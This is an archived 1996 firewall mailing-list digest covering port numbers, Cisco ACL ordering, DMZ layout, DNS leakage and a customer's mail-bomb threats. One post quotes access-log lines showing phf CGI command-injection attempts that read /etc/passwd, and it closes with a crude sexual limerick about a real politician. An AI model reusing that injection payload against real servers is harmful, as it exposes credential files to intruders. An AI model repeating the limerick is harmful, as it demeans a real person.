(4.1/SMI-4.1) Message-Id: <9607101332.AA12409@netevolve.com> Comments: Authenticated sender is From: "Irwin Lazar" Organization: Network Evolutions To: firewalls@greatcircle.com Date: Wed, 10 Jul 1996 09:29:54 +0000 Subject: Well Known Port Numbers Reply-To: lazar@netevolve.com X-Mailer: Pegasus Mail for Windows (v2.23) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings all: I'm trying to find the well known TCP and UDP port numbers to allow access to Usenet and WAIS but can't seem to find them in any of the reference materials I have. Does anyone know of or have this information? Thanks. Irwin M. Lazar Network Evolutions, Inc. lazar@netevolve.com From firewalls-owner Wed Jul 10 07:09:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA08484 for firewalls-outgoing; Wed, 10 Jul 1996 06:32:28 -0700 (PDT) Received: from woffice10.welsh-ofce.gov.uk (woffice10.welsh-ofce.gov.uk [194.81.116.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA08424 for ; Wed, 10 Jul 1996 06:32:08 -0700 (PDT) Received: from woffice11.welsh-ofce.gov.uk.welsh-ofce.gov.uk (woffice11.welsh-ofce.gov.uk [194.81.116.4]) by woffice10.welsh-ofce.gov.uk (8.7.4/8.6.12) with SMTP id OAA00520 for ; Wed, 10 Jul 1996 14:29:21 +0100 (BST) Date: Wed, 10 Jul 96 14:19:46 PDT From: howells@Welsh-Ofce.gov.uk Subject: RE: Firewalls-Digest V5 #411 To: Firewalls@GreatCircle.COM X-Mailer: Chameleon ENGP1, TCP/IP for Windows, NetManage Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rob A quick trip into Netscape - http://www.intonet.co.uk - shows that Intonet is a small UK service provider based in London. It's not clear from your posting what the product this person/company purchased but it is quite possible that the person is nothing to do with Intonet as a company. I would suggest passing the busk to your tech. support people with a note that this guy is not happy while, simultaneously contacting Intonet (with your managements approval) to let them know what is going on (if he is 'internal' it will ring alarm bells with his senior management, while if he is a customer they may wish to monitor the threats he's making). --Original Message-- Date: Tue, 9 Jul 1996 09:06:09 -0700 From: Rob Sansom Subject: Threats and Nasty Emails Although this is not really related to firewalls, I was wondering If anyone had a suggestion for a response to a belligerent individual who has been threatening to 'mail bomb' our site, as well as slander our company in the UK. Apparently , this person is very disatisfied with the performance of the product that they purchased, and the resulting response from tech support. I guess that they got so frustrated that they sent a letter to 'root' at our site, and that's how I got involved. I am wondering if a response to the 'postmaster, or root at their site would be a good idea, or should I just let it be. It's easy to block access from their net, but I would rather not do this. The net in question is 'intonet.co.uk' and I have tried 'whois' on the domain to no avail (to try to contact the net admin, God forbid this person should be the net admin!), and if anyone has any information on a contact at intonet.co.uk, I would greatly appreciarte any information. Thanks in Advance, Rob Sansom Network Admin. Connectix Corp (415) 638-7398 sansom@connectix.com --End of Original Message-- These views are my own and do not represent the views of my Department. Regards Jerry ------------------------------------- Name: Jeremy P Howells E-mail: howells@welsh-ofce.gov.uk Time: 14:19:47 Date: 07/10/96 Tel: (UK) 01222 825754 Fax: (UK) 01222 825852 ------------------------------------ From firewalls-owner Wed Jul 10 07:19:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA11884 for firewalls-outgoing; Wed, 10 Jul 1996 07:10:19 -0700 (PDT) Received: from gate1.dttus.com (gate1.dttus.com [205.160.40.75]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA11825 for ; Wed, 10 Jul 1996 07:10:00 -0700 (PDT) Received: from cc1.dttus.com by gate1.dttus.com (5.x/SMI-SVR4) Received: from ccMail by cc1.dttus.com (SMTPLINK V2.11 PreRelease 4) Date: Wed, 10 Jul 96 09:00:00 CST From: "John M. Shaw" Message-Id: <9606108370.AA837014565@cc1.dttus.com> To: firewalls@GreatCircle.com Subject: Newbie Cisco Access-List Question Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Assuming 2 lines with same source, s-mask, dest, and d-mask: access-list 101 permit tcp source s-mask dest d-mask gt 1023 access-list 101 deny tcp source s-mask dest d-mask eq 2049 Which one takes precedence? Does the order matter? Any help would be greatly appreciated? From firewalls-owner Wed Jul 10 07:49:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA16239 for firewalls-outgoing; Wed, 10 Jul 1996 07:45:22 -0700 (PDT) Received: from stingray.ivision.co.uk (stingray.ivision.co.uk [194.154.62.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA16070 for ; Wed, 10 Jul 1996 07:44:51 -0700 (PDT) Received: from stingray.ivision.co.uk [194.154.62.8] Date: Wed, 10 Jul 1996 15:38:13 +0100 (BST) From: Neil A Carson To: Irwin Lazar cc: firewalls@greatcircle.com Subject: Re: Well Known Port Numbers In-Reply-To: <9607101332.AA12409@netevolve.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jul 1996, Irwin Lazar wrote: > Greetings all: > > I'm trying to find the well known TCP and UDP port numbers to allow > access to Usenet and WAIS but can't seem to find them in any of the > reference materials I have. Does anyone know of or have this > information? On a unix box, try looking in /etc/services. Or use the NIS services file, by typing ypcat services. This yields z39.50 210/tcp wais #ANSI Z39.50 z39.50 210/udp wais #ANSI Z39.50 nntp 119/tcp usenet #Network News Transfer Protocol nntp 119/udp usenet #Network News Transfer Protocol on a FreeBSD box here. Unless of course you have stripped down the services file (which one would do in building a firewall anyway). Yours Aye, Neil * Neil A Carson * Internet Vision Ltd. * E-Mail: neil@ivision.co.uk, Phone: (0171) 589 4500 From firewalls-owner Wed Jul 10 08:04:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA14845 for firewalls-outgoing; Wed, 10 Jul 1996 07:36:17 -0700 (PDT) Received: from zen.com (zen.com [156.70.135.251]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA14764 for ; Wed, 10 Jul 1996 07:35:56 -0700 (PDT) Received: from usuwphmsx03.zen.con (usuwphmsx03.zen.com) by zen.com (4.1/SMI-4.1) Received: by usuwphmsx03.zen.con with Microsoft Exchange (IMC 4.0.837.3) Message-Id: From: Miller Robert RC To: "'firewalls@GreatCircle.COM'" Subject: RE: Threats and Nasty Emails Date: Wed, 10 Jul 1996 10:33:56 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >>At 09:06 AM 7/9/96 -0700, Rob Sansom allegedly wrote: > >>>>Although this is not really related to firewalls, I was wondering If >>>>anyone had a suggestion for a response to a belligerent individual who >>>>has been threatening to 'mail bomb' our site, as well as slander our >>>>company in the UK. . . . > >>Frank writes some good advice, and then says: >>>If the customer does not have a legitimate complaint, explain to the >>>individual why the complaint is not valid. . . . Chris responded: >>Absolutely not. You're a sysadmin, not customer support or a service >>bureau for outside things. Take the issues to your management, and >>let them deal with it. You shouldn't in any way contact the customer. What Chris says is absolutely correct! You shouldn't even respond to the persons note without passing it on to your management, Legal Department, PR department, Customer Service Department or whatever (depending on how big your company is). Even then, it should not be for you to respond, but for one of them. Leave that to the people who get paid to deal with the customers... Bob Miller millerrc@zen.com Zeneca Pharmaceuticals, Inc. From firewalls-owner Wed Jul 10 08:20:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA17948 for firewalls-outgoing; Wed, 10 Jul 1996 07:59:27 -0700 (PDT) Received: from cet.cet.com (cet.cet.com [204.227.191.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA17941 for ; Wed, 10 Jul 1996 07:59:21 -0700 (PDT) Received: from cet.cet.com (roberth@cet.cet.com [204.227.191.1]) by cet.cet.com (8.6.12/8.6.12) with SMTP id HAA06382; Wed, 10 Jul 1996 07:56:43 -0700 Date: Wed, 10 Jul 1996 07:56:43 -0700 (PDT) From: Robert Hanson To: Irwin Lazar cc: firewalls@GreatCircle.COM Subject: Re: Well Known Port Numbers In-Reply-To: <9607101332.AA12409@netevolve.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk wais 210 nntp 119 ---> Robert H. Hanson LAN/WAN Consultant - Internet Service Provider Otis Orchards, Wa. Cutting Edge Communications www.cet.com (509) 927-9541 finger: info@cet.com or email: roberth@cet.com On Wed, 10 Jul 1996, Irwin Lazar wrote: > Greetings all: > > I'm trying to find the well known TCP and UDP port numbers to allow > access to Usenet and WAIS but can't seem to find them in any of the > reference materials I have. Does anyone know of or have this > information? > > Thanks. > Irwin M. Lazar > Network Evolutions, Inc. > lazar@netevolve.com > From firewalls-owner Wed Jul 10 08:31:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA17478 for firewalls-outgoing; Wed, 10 Jul 1996 07:54:41 -0700 (PDT) Received: from achilles.noc.ntua.gr (achilles.noc.ntua.gr [147.102.222.210]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA17391 for ; Wed, 10 Jul 1996 07:54:20 -0700 (PDT) Received: by achilles.noc.ntua.gr via NTUAnet with ESMTP Received: by noc.ntua.gr From: Yiorgos Adamopoulos Message-Id: <199607101451.RAA13089@noc.ntua.gr> Subject: Re: Well Known Port Numbers To: lazar@netevolve.com Date: Wed, 10 Jul 1996 17:51:18 +0300 (EET DST) Cc: firewalls@GreatCircle.COM In-Reply-To: <9607101332.AA12409@netevolve.com> from "Irwin Lazar" at Jul 10, 96 09:29:54 am Organization: NTUA-NOC, National Technical University of Athens, GREECE Reply-To: y.adamopoulos@noc.ntua.gr X-Disclaimer: My opinions do not necessarily represent those of my employer. X-Home-Address: 7 Elvetias St., Agia Paraskevi GR15342, Athens, GREECE X-Home-Phone: +30-1-639-4-638 X-Work-Phone: +30-1-772-1-861 X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I'm trying to find the well known TCP and UDP port numbers to allow > access to Usenet and WAIS but can't seem to find them in any of the > reference materials I have. Does anyone know of or have this > information? I think you need to read the "Assigned Numbers" RFC (by IANA, can't remember the nuber) and mainly the ports section. -Yiorgos. Y.Adamopoulos@noc.ntua.gr From firewalls-owner Wed Jul 10 08:34:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA20598 for firewalls-outgoing; Wed, 10 Jul 1996 08:21:35 -0700 (PDT) Received: from rodan.UU.NET (rodan.UU.NET [153.39.130.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA20570 for ; Wed, 10 Jul 1996 08:21:22 -0700 (PDT) Received: from woobie.uu.net by rodan.UU.NET with SMTP Message-ID: <31E3C9D9.167EB0E7@uu.net> Date: Wed, 10 Jul 1996 11:18:49 -0400 From: Mark Krause Organization: UUNET Technologies, Inc. X-Mailer: Mozilla 3.0b5 (X11; I; SunOS 4.1.3_U1 sun4c) MIME-Version: 1.0 To: lazar@netevolve.com CC: firewalls@greatcircle.com Subject: Re: Well Known Port Numbers References: <9607101332.AA12409@netevolve.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Irwin Lazar wrote: > > I'm trying to find the well known TCP and UDP port numbers to allow > access to Usenet and WAIS but can't seem to find them in any of the > reference materials I have. Does anyone know of or have this > information? Both of these are hard to find, since they are usually listed via NNTP (Network News Transfer Protocol) for USENET, and Z39.50 (the standard that WAIS is based on). USENET aka NNTP = TCP 119 WAIS aka Z39.50 = TCP 210 The following are good resources for looking up port numbers. ftp://ds.internic.net/std/std2.txt Assigned Numbers RFC 1700 The strobe.services file in the strobe distribution located at ftp://suburbia.net/pub/strobe.tgz Appendix G "Table of IP Services" in "Practical UNIX & Internet Security" 2nd Edition from O'Reilly & Associates, Inc. -- Mark Krause UUNET Technologies, Inc. http://www.uu.net/ Senior Security Engineer 3060 Williams Drive mkrause@uu.net Fairfax, VA 22031-4648 USA Tel: +1 703 208 5349 Fax: +1 703 206 5493 From firewalls-owner Wed Jul 10 09:49:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA28491 for firewalls-outgoing; Wed, 10 Jul 1996 09:42:56 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA28482 for ; Wed, 10 Jul 1996 09:42:50 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id LAA16432; Wed, 10 Jul 1996 11:40:02 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id LAA04919; Wed, 10 Jul 1996 11:31:49 -0500 Received: by sonic.nmti.com; id AA32200; Wed, 10 Jul 1996 11:31:48 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607101631.AA32200@sonic.nmti.com.nmti.com> Subject: Re: Well Known Port Numbers To: neil@ivision.co.uk (Neil A Carson) Date: Wed, 10 Jul 1996 11:31:47 -0500 (CDT) Cc: lazar@netevolve.com, firewalls@GreatCircle.COM In-Reply-To: from "Neil A Carson" at Jul 10, 96 03:38:13 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Unless of course you have stripped down the services file (which one would > do in building a firewall anyway). Why? It's the inetd.conf file that controls that stuff, not services. From firewalls-owner Wed Jul 10 10:04:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA28197 for firewalls-outgoing; Wed, 10 Jul 1996 09:36:21 -0700 (PDT) Received: from gate1.dttus.com (gate1.dttus.com [205.160.40.75]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA28190 for ; Wed, 10 Jul 1996 09:36:15 -0700 (PDT) Received: from cc1.dttus.com by gate1.dttus.com (5.x/SMI-SVR4) Received: from ccMail by cc1.dttus.com (SMTPLINK V2.11 PreRelease 4) Date: Wed, 10 Jul 96 10:38:05 CST From: "John M. Shaw" Message-Id: <9606108370.AA837020476@cc1.dttus.com> To: firewalls@GreatCircle.com Subject: Re[2]: Newbie Cisco Access-List Question Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is is the same for "ip route": If I have 2 lines from my ISP hooked up to the serial lines on my router : ip route 0.0.0.0 0.0.0.0 Serial0 ip route 0.0.0.0 0.0.0.0 Serial1 Will anything get sent over Serial1? Is there a way to somewhat balance the load between the 2 lines? TIA jshaw@dttus.com ______________________________ Reply Separator _________________________________ Subject: Re: Newbie Cisco Access-List Question Author: Warren Auld at INTERNET-USA Date: 7/10/96 10:08 AM Hi, Yes, order matters -- the entries in an access list are evaluated sequentially until a match is found at which point the packet is either sent on or rejected. In the example you gave below, all packets addressed to ports higher than 1023 will make it through and the second line will never have any effect. If you reverse the lines, traffic to port 2049 would be denied while everything else above 1023 would get through. Hope this helps.... warren wauld01@mail.state.mo.us On Wed, 10 Jul 1996, John M. Shaw wrote: > > > Assuming 2 lines with same source, s-mask, dest, and d-mask: > > access-list 101 permit tcp source s-mask dest d-mask gt 1023 > access-list 101 deny tcp source s-mask dest d-mask eq 2049 > > Which one takes precedence? > Does the order matter? > > Any help would be greatly appreciated? > > From firewalls-owner Wed Jul 10 10:34:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA00672 for firewalls-outgoing; Wed, 10 Jul 1996 10:20:28 -0700 (PDT) Received: from gatekeeper.glaxo.com (gatekeeper.glaxo.com [192.58.204.201]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA00653 for ; Wed, 10 Jul 1996 10:20:20 -0700 (PDT) Received: by gatekeeper.glaxo.com (5.65/fma-120691); Received: from ussun2f. (ussun2f.glaxo.com) by ussun1d (5.x/) Reply-To: ggh14854@ussun2f.glaxo.com Received: (from ggh14854@localhost) by ussun2f. (8.7.5/8.7.3) id NAA01250; Wed, 10 Jul 1996 13:19:21 -0400 (EDT) Date: Wed, 10 Jul 1996 13:19:20 -0400 (EDT) From: "Gary G. Hull" To: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk REVIEW firewalls by Name From firewalls-owner Wed Jul 10 10:49:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA02914 for firewalls-outgoing; Wed, 10 Jul 1996 10:42:05 -0700 (PDT) Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA02889 for ; Wed, 10 Jul 1996 10:41:57 -0700 (PDT) Received: from pferguso-pc.cisco.com (c5robo3.cisco.com [171.68.13.131]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id KAA28650; Wed, 10 Jul 1996 10:40:27 -0700 Message-Id: <199607101740.KAA28650@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 10 Jul 1996 13:39:25 -0400 To: lazar@netevolve.com From: Paul Ferguson Subject: Re: Well Known Port Numbers Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Try RFC-1700. - paul At 09:29 AM 7/10/96 +0000, Irwin Lazar wrote: >Greetings all: > >I'm trying to find the well known TCP and UDP port numbers to allow >access to Usenet and WAIS but can't seem to find them in any of the >reference materials I have. Does anyone know of or have this >information? > >Thanks. >Irwin M. Lazar >Network Evolutions, Inc. >lazar@netevolve.com > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Wed Jul 10 11:05:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA03337 for firewalls-outgoing; Wed, 10 Jul 1996 10:45:09 -0700 (PDT) Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA03247 for ; Wed, 10 Jul 1996 10:44:51 -0700 (PDT) Received: from pferguso-pc.cisco.com (c5robo3.cisco.com [171.68.13.131]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id KAA29656; Wed, 10 Jul 1996 10:43:21 -0700 Message-Id: <199607101743.KAA29656@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 10 Jul 1996 13:42:18 -0400 To: "John M. Shaw" From: Paul Ferguson Subject: Re: Newbie Cisco Access-List Question Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:00 AM 7/10/96 CST, John M. Shaw wrote: > Assuming 2 lines with same source, s-mask, dest, and d-mask: > > access-list 101 permit tcp source s-mask dest d-mask gt 1023 > access-list 101 deny tcp source s-mask dest d-mask eq 2049 > > Which one takes precedence? The access-list expressions are parsed linearly, from first-to-last, until a match is made and then no further ACL's are referenced. Also, in the example above, any packet which did not match either ACL would be implicitly denied. - paul > Does the order matter? > > Any help would be greatly appreciated? > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Wed Jul 10 11:19:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA05522 for firewalls-outgoing; Wed, 10 Jul 1996 11:07:11 -0700 (PDT) Received: from gatekeeper.3Com.COM (gatekeeper.3Com.COM [129.213.128.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA05486 for ; Wed, 10 Jul 1996 11:06:55 -0700 (PDT) Received: from manzanita.DEV.3Com.COM.noname (manzanita.DEV.3Com.COM) by gatekeeper.3Com.COM with SMTP id AA27708 Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) Date: Wed, 10 Jul 96 11:02:56 PDT From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9607101802.AA02049@manzanita.DEV.3Com.COM.noname> To: Firewalls@GreatCircle.COM, ggh14854@ussun2f.glaxo.com Subject: Re: Web Server on DMZ Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yes, you can put the web server on your DMZ, but the real answer here is to run TWO firewalls. Like so: --company net ---/Corp-Firewall/---DMZ w/servers---/outer firewall/ --Internet The job of the Corp-Firewall is to protect the company network, the job of the outer firewall is to protect the exposed servers. If necessary, the outer firewall can also be used as a backup corp firewall. Or better yet, to complement it by using a different technology which will help make your network harder to crack into. BobK From firewalls-owner Wed Jul 10 12:23:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA12959 for firewalls-outgoing; Wed, 10 Jul 1996 12:12:45 -0700 (PDT) Received: from gate.ups.com (gate.ups.com [198.80.14.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA12925 for ; Wed, 10 Jul 1996 12:12:10 -0700 (PDT) Received: from is.ups.com (smtp.telecom.ups.com) by gate.ups.com with SMTP id AA17374 Received: from butthead.ups.com by is.ups.com (5.x/SMI-SVR4) Received: from localhost by butthead.ups.com (SMI-8.6/SMI-SVR4) Date: Wed, 10 Jul 1996 15:09:06 -0400 (EDT) From: Dave Wreski X-Sender: tel1dvw@butthead To: Bob Konigsberg Cc: Firewalls@GreatCircle.COM, ggh14854@ussun2f.glaxo.com Subject: Re: Web Server on DMZ In-Reply-To: <9607101802.AA02049@manzanita.DEV.3Com.COM.noname> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jul 1996, Bob Konigsberg wrote: > > The job of the Corp-Firewall is to protect the company network, the > job of the outer firewall is to protect the exposed servers. > > If necessary, the outer firewall can also be used as a backup corp > firewall. Or better yet, to complement it by using a different technology > which will help make your network harder to crack into. What type of different technology do you recommend? This sounds interesting, as this is how we currently implement our firewalls/servers.. Dave > > BobK > From firewalls-owner Wed Jul 10 12:34:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA13461 for firewalls-outgoing; Wed, 10 Jul 1996 12:30:13 -0700 (PDT) Received: from ftp.com (ftp.com [128.127.2.122]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA13446 for ; Wed, 10 Jul 1996 12:30:03 -0700 (PDT) Received: from ftp.com by ftp.com ; Wed, 10 Jul 1996 15:27:26 -0400 Received: from mailserv-100bs.ftp.com by ftp.com ; Wed, 10 Jul 1996 15:27:26 -0400 Received: by MAILSERV-100BS.FTP.COM (SMI-8.6/SMI-SVR4) Date: Wed, 10 Jul 1996 15:26:12 -0400 Message-Id: <199607101926.PAA27134@MAILSERV-100BS.FTP.COM> To: lazar@netevolve.com Subject: Re: Well Known Port Numbers From: chip@ftp.com (Chip Sparling) Reply-To: chip@ftp.com Cc: firewalls@greatcircle.com Repository: mailserv-100bs.ftp.com, [message accepted at Wed Jul 10 15:26:02 1996] Originating-Client: slingshot.ftp.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I'm trying to find the well known TCP and UDP port numbers to allow >access to Usenet and WAIS but can't seem to find them in any of the >reference materials I have. Does anyone know of or have this >information? IANA owns these, the official list can be found at; ftp://venera.isi.edu/in-notes/iana/assignments/port-numbers if you backup one level you'll find all the assigned numbers. chip From firewalls-owner Wed Jul 10 12:52:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA12921 for firewalls-outgoing; Wed, 10 Jul 1996 12:12:06 -0700 (PDT) Received: from Grosses-Raetsel-Tor.GeNUA.DE (Grosses-Raetsel-Tor.GeNUA.DE [193.141.169.26]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA12914 for ; Wed, 10 Jul 1996 12:11:56 -0700 (PDT) Received: (from smap@localhost) by Grosses-Raetsel-Tor.GeNUA.DE (8.6.12/8.6.12) id VAA28652; Wed, 10 Jul 1996 21:08:47 +0200 Received: from auryn.genua.de(192.109.217.42) by Grosses-Raetsel-Tor.GeNUA.DE via smap (V1.3) Received: from auryn.genua.de (localhost [127.0.0.1]) by auryn.genua.de (8.7.4/8.7.3) with ESMTP id VAA20793; Wed, 10 Jul 1996 21:08:18 +0200 (MET DST) Message-Id: <199607101908.VAA20793@auryn.genua.de> To: Firewalls@greatcircle.com cc: Shepherd Rudie Subject: Re: DNS leakage In-reply-to: Your message of Wed, 10 Jul 1996 01:00:30 -0700. MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <20790.837025697.1@auryn.genua.de> Date: Wed, 10 Jul 1996 21:08:17 +0200 From: Bernhard Schneck Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Problem is this: > The last time my zone was transferred to my ISP, the INTERNAL names > suddenly appeared on the internet! Of course this wrecked e-mail and > other things as well, but how is this possible? How can the outside DNS > provide the secondary with any information regarding the inside? BTW the > inside network is not even accessible from the Internet (and thus the > secondary DNS). Any ideas? Make sure you run a (moderately) recent version of BIND, 4.9.3p1 or 4.9.4. Earlier versions may have some problems with cache poisoning even in authoritative zones ... \Bernhard. From firewalls-owner Wed Jul 10 13:04:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA14042 for firewalls-outgoing; Wed, 10 Jul 1996 12:45:53 -0700 (PDT) Received: from mis01.micron.net (mis01.micron.net [198.60.253.51]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA14033 for ; Wed, 10 Jul 1996 12:45:43 -0700 (PDT) From: jbarnett@micron.net Received: from 204.134.209.84 by mis01.micron.net with smtp Message-Id: Date: Wed, 10 Jul 96 13:43 MDT Subject: Sidewinder Versus EagleRaptor To: firewalls@GreatCircle.com X-Mailer: AIR Mail 3.X (SPRY, Inc.) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My organization is finally coming close to making a decision on a firewall product. My question is this: is there anyone in this group who has evaluated both Sidewinder and EagleRaptor within the past year and has: 1) selected EagleRaptor but now wishes they had gone with Sidewinder 2) selected Sidewinder but now wishes they had gone with EagleRaptor 3) selected EagleRaptor for NT and is experiencing difficulties or is elated You can respond privately to me at jbarnett@micron.net, please. Since this is the first time I have tried to post anything to this group (I just joined today), please forgive me if I somehow stepped on any rules for posting. Thanks! jon ######################################################### Jon Barnett jbarnett@micron.net (208) 384-7018 "Colorful ideas are a pigment of your own imagination" ######################################################### From firewalls-owner Wed Jul 10 13:20:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA13484 for firewalls-outgoing; Wed, 10 Jul 1996 12:31:35 -0700 (PDT) Received: from morebbs.com (morebbs.com [206.165.150.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA13477 for ; Wed, 10 Jul 1996 12:31:24 -0700 (PDT) From: meowmyx@morebbs.com Received: by morebbs.com Message-ID: <9607101528.0LQZ300@morebbs.com> Organization: MORE BBS X-Mailer: TBBS/TIGER v1.0/PRIMP 1.56p Date: Wed, 10 Jul 96 15:28:54 Subject: Dirty dogs To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I was browsing through the system files of a web server that sits outside a firewall There were a couple of interesting entries in the access log 960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207 960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207 This didnt work for two reasons One there is no phf program in the system Two the cgi application gateway is running chrooted I am not really very good at understanding this hacking and cracking stuff What else could they have tried that might have worked FlameThrower>> ON The Mayor of White Water, had a very pretty daughter, Her name was Sweet Hillary, she was eager to please. Although lovely Hillary, wore clothes that were billowy, The hairs on her dickey die doe, hung down to her knees. One black one, one white one, and one that Bill caught a trout on, The hairs on her dickey die doe, hung down to her knees. If she were my daughter, I would have cut them much shorter, The hairs on her dickey die doe, hung down to her knees. Ooops Damn Slightly singed left whiskers FlameThrower>> OFF MeOwMyX From firewalls-owner Wed Jul 10 13:24:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA16355 for firewalls-outgoing; Wed, 10 Jul 1996 13:04:20 -0700 (PDT) Received: from dsacg1.dsac.dla.mil (dsacg1.dsac.dla.mil [131.78.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA16285 for ; Wed, 10 Jul 1996 13:04:03 -0700 (PDT) Received: by dsacg1.dsac.dla.mil (1.38.193.5/1.40 (DSDC Columbus 